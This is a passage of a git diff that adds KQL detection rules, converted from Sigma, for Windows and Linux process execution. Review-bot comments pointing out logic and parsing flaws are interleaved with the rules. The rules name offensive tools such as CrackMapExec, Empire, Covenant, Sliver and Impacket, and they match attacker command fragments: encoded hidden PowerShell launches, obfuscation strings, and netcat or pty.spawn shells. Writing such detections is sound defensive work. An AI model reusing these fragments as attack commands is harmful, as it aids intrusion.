+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
new file mode 100644
index 00000000..05ba71c1
--- /dev/null
+++ b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
@@ -0,0 +1,14 @@
+// Title: Fsutil Behavior Set SymlinkEvaluation
+// Author: frack113
+// Date: 2022-03-02
+// Level: medium
+// Description: A symbolic link is a type of file that contains a reference to another file.
+This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql
new file mode 100644
index 00000000..62765b23
--- /dev/null
+++ b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql
@@ -0,0 +1,12 @@
+// Title: GAC DLL Loaded Via Office Applications
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: high
+// Description: Detects any GAC DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
+| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql
new file mode 100644
index 00000000..7c1d5929
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Covenant PowerShell Launcher
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2020-06-04
+// Level: high
+// Description: Detects suspicious command lines used in Covenant luanchers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql
new file mode 100644
index 00000000..9892aa5a
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql
new file mode 100644
index 00000000..074c02c8
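Review bot: The final clause of the where expression joins the three network fragments with `and`, so that branch only fires when a single command line contains ` 10.` and ` 192.168.` and `/24 ` all at once, which makes it close to unreachable. These read as alternative private-range hints rather than a conjunction; if the source rule lists them as a plain any-of list, the converted clause should be `(ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains "/24 ")`. Worth checking the converter's handling of list-valued `contains` without an all-of modifier, since the same shape may affect other rules in this batch.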
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec PowerShell Obfuscation
+// Author: Thomas Patzke
+// Date: 2020-05-22
+// Level: high
+// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql
new file mode 100644
index 00000000..04c0865a
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation
+// Author: Markus Neis, @Karneades
+// Date: 2018-03-06
+// Level: high
+// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/SC ONLOGON" or ProcessCommandLine contains "/SC DAILY /ST" or ProcessCommandLine contains "/SC ONIDLE" or ProcessCommandLine contains "/SC HOURLY") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "powershell.exe -NonI" and ProcessCommandLine contains "/TN Updater /TR") and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql
new file mode 100644
index 00000000..7ca42abc
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Empire PowerShell Launch Parameters
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-04-20
+// Level: high
+// Description: Detects suspicious powershell command line parameters used in Empire
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other tools that incidentally use the same command line parameters
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand "
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql
new file mode 100644
index 00000000..a8c8d9fb
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Jlaive In-Memory Assembly Execution
+// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
+// Date: 2022-05-24
+// Level: medium
+// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_koadic_execution.kql b/KQL/rules/Execution/hacktool_koadic_execution.kql
new file mode 100644
index 00000000..1cdebca1
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_koadic_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Koadic Execution
+// Author: wagga, Jonhnathan Ribeiro, oscd.community
+// Date: 2020-01-12
+// Level: high
+// Description: Detects command line parameters used by Koadic hack tool
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_pchunter_execution.kql b/KQL/rules/Execution/hacktool_pchunter_execution.kql
new file mode 100644
index 00000000..766616e0
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_pchunter_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - PCHunter Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2022-10-10
+// Level: high
+// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((SHA1 startswith "5F1CBC3D99558307BC1250D084FA968521482025" or SHA1 startswith "3FB89787CB97D902780DA080545584D97FB1C2EB") or (MD5 startswith "987B65CD9B9F4E9A1AFD8F8B48CF64A7" or MD5 startswith "228DD0C2E6287547E26FFBD973A40F14") or (SHA256 startswith "2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32" or SHA256 startswith "55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C")) or (FolderPath endswith "\\PCHunter64.exe" or FolderPath endswith "\\PCHunter32.exe") or (ProcessVersionInfoOriginalFileName =~ "PCHunter.exe" or ProcessVersionInfoFileDescription =~ "Epoolsoft Windows Information View Tools")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql
new file mode 100644
index 00000000..3658ad67
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql
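Review bot: The hash conditions in the where clause compare complete MD5/SHA1/SHA256 digests with `startswith`, which reads as a prefix match even though each literal is a full-length hash; a case-insensitive equality such as `SHA1 in~ ("5F1CBC3D99558307BC1250D084FA968521482025", "3FB89787CB97D902780DA080545584D97FB1C2EB")` states the intent directly and cannot over-match if a literal is ever shortened. This is a style point rather than a behaviour change for the values as written. The same `startswith` pattern on SHA256 appears in the HackTool - Stracciatella Execution hunk.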
@@ -0,0 +1,10 @@
+// Title: HackTool - Potential Impacket Lateral Movement Activity
+// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
+// Date: 2019-09-03
+// Level: high
+// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql
new file mode 100644
index 00000000..5199f9e7
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - RedMimicry Winnti Playbook Execution
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
new file mode 100644
index 00000000..628c8f88
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SharpWSUS/WSUSpendu Execution
+// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-07
+// Level: high
+// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
+Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1210
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -Inject " and (ProcessCommandLine contains " -PayloadArgs " or ProcessCommandLine contains " -PayloadFile ")) or ((ProcessCommandLine contains " approve " or ProcessCommandLine contains " create " or ProcessCommandLine contains " check " or ProcessCommandLine contains " delete ") and (ProcessCommandLine contains " /payload:" or ProcessCommandLine contains " /payload=" or ProcessCommandLine contains " /updateid:" or ProcessCommandLine contains " /updateid="))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql
new file mode 100644
index 00000000..94238395
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Sliver C2 Implant Activity Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-08-25
+// Level: critical
+// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_stracciatella_execution.kql b/KQL/rules/Execution/hacktool_stracciatella_execution.kql
new file mode 100644
index 00000000..67bc7020
--- /dev/null
+++ b/KQL/rules/Execution/hacktool_stracciatella_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Stracciatella Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..4af545e9
--- /dev/null
+++ b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Hardware Model Reconnaissance Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql
new file mode 100644
index 00000000..dbf7b375
--- /dev/null
+++ b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Hidden Powershell in Link File Pattern
+// Author: frack113
+// Date: 2022-02-06
+// Level: medium
+// Description: Detects events that appear when a user click on a link file with a powershell command in it
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate commands in .lnk files
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
new file mode 100644
index 00000000..fb234fca
--- /dev/null
+++ b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
@@ -0,0 +1,11 @@
+// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: high
+// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql
new file mode 100644
index 00000000..b38af5a6
--- /dev/null
+++ b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql
@@ -0,0 +1,10 @@
+// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-10
+// Level: medium
+// Description: Detects powershell scripts that import modules from suspicious directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
new file mode 100644
index 00000000..a2c06cf5
--- /dev/null
+++ b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
@@ -0,0 +1,11 @@
+// Title: Inline Python Execution - Spawn Shell Via OS System Library
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -c " and ProcessCommandLine contains "os.system(")) and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql
new file mode 100644
index 00000000..a30299b8
--- /dev/null
+++ b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insecure Proxy/DOH Transfer Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--doh-insecure" or ProcessCommandLine contains "--proxy-insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file 
diff --git a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql
new file mode 100644
index 00000000..d98ec616
--- /dev/null
+++ b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insecure Transfer Via Curl.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-30
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "--insecure" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
new file mode 100644
index 00000000..cce61814
--- /dev/null
+++ b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
@@ -0,0 +1,14 @@
+// Title: Installation of WSL Kali-Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).
+Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl") and (ProcessCommandLine contains " --install " or ProcessCommandLine contains " -i ") and ProcessCommandLine contains "kali"
\ No newline at end of file 
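Review bot: The `matches regex "\\s-k\\s"` term on the `| where` line requires whitespace on both sides of `-k`, so a command line whose last token is `-k` is not matched, while `--insecure` is covered separately by the `contains` term. A small widening keeps the intent without loosening anything else: `ProcessCommandLine matches regex "\\s-k(\\s|$)"`. KQL `matches regex` is case-sensitive, which is what you want here because `-K` is a different curl option (config file), so the regex should stay as the only case-sensitive term in this rule.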
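Review bot: The second description line `Attackers may use Kali Linux WSL ...` has no `//` prefix, so it is not a comment and sits in front of `DeviceProcessEvents` as query text, which should make the whole file fail to parse when loaded. It looks like the converter emits multi-line Sigma descriptions verbatim; the fix is to prefix the continuation with `// ` (or fold it onto the `// Description:` line). The same defect appears in `kaspersky_endpoint_security_stopped_via_commandline_linux.kql` later in this patch (`This activity may indicate ...`), so this is probably worth fixing once in the conversion script rather than per file.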
diff --git a/KQL/rules/Execution/interactive_bash_suspicious_children.kql b/KQL/rules/Execution/interactive_bash_suspicious_children.kql
new file mode 100644
index 00000000..39f937fb
--- /dev/null
+++ b/KQL/rules/Execution/interactive_bash_suspicious_children.kql
@@ -0,0 +1,12 @@
+// Title: Interactive Bash Suspicious Children
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036
+// False Positives:
+// - Legitimate software that uses these patterns
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine =~ "bash -i" and ((ProcessCommandLine contains "-c import " or ProcessCommandLine contains "base64" or ProcessCommandLine contains "pty.spawn") or (FolderPath endswith "whoami" or FolderPath endswith "iptables" or FolderPath endswith "/ncat" or FolderPath endswith "/nc" or FolderPath endswith "/netcat"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql b/KQL/rules/Execution/jamf_mdm_execution.kql
new file mode 100644
index 00000000..ed6614e6
--- /dev/null
+++ b/KQL/rules/Execution/jamf_mdm_execution.kql 
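Review bot: On the `| where` line, `FolderPath endswith "whoami"` and `FolderPath endswith "iptables"` lack the leading `/` that the neighbouring `"/ncat"`, `"/nc"` and `"/netcat"` terms carry, so any binary whose name merely ends in those strings also matches. For consistency and precision use `FolderPath endswith "/whoami" or FolderPath endswith "/iptables"`. Note also that `InitiatingProcessCommandLine =~ "bash -i"` is an exact (case-insensitive) equality, so a parent recorded as `/bin/bash -i` or with any extra argument is not matched; if that narrowness is intended, a header comment such as `// Note: parent command line must be exactly "bash -i"` would save the next reader from re-deriving it.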
@@ -0,0 +1,13 @@
+// Title: JAMF MDM Execution
+// Author: Jay Pandit
+// Date: 2023-08-22
+// Level: low
